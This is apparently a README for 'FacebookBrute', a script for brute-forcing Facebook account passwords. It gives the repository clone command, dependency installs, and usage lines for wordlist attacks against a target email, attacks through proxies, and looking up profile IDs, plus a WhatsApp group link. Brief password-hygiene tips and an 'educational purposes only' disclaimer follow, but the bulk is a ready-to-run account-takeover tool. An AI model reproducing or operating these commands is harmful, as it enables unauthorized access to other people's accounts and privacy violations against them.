Facebook Bruteforcing Tool
Go to whatsapp group https://chat.whatsapp.com/Bunuongm31lHbxLw6g5zS9
- SCRIPT: FacebookBrute
- JOB: Brute Force Attack On Facebook Accounts
SCRIPT ScreeenShot:
Command: python3 facebookBrute.py -t Oseid@gmail.com -w wlist.txt
- Brute Force On Facebook Account With Proxy:
Command: python3 facebookBrute.py -t Oseid@gmail.com -w wlist.txt -p
- Get Target Facebook Profile ID:
Command: python3 facebookBrute.py -g https://www.facebook.com/zuck
- git clone https://github.com/Aryan-mfc/FacebookBrute.git
- cd FacebookBrute/
- pip install requests
- pip install mechanize
- Windows
- Linux
- Android~Termux
- MacOs
- any Os has python(2.x, 3.x) with required modules
- Use Strong Password which contains {letters(lower,upper),tokens,numbers} make it longest as possible, at least 10 letters
- don't use your basic information in the password for example don't use your name or birthday
because the hacker can do a information gathering attack and get this information easily
then he will generate a wordlist based on this info. - Use 2F Authentication.
- this script is only for educational purposes
- i am not responsible for your actions.
- This Script Coded By Aryan Mfc
- Thanks For Usage
- Have A Nice Day...GoodBye :)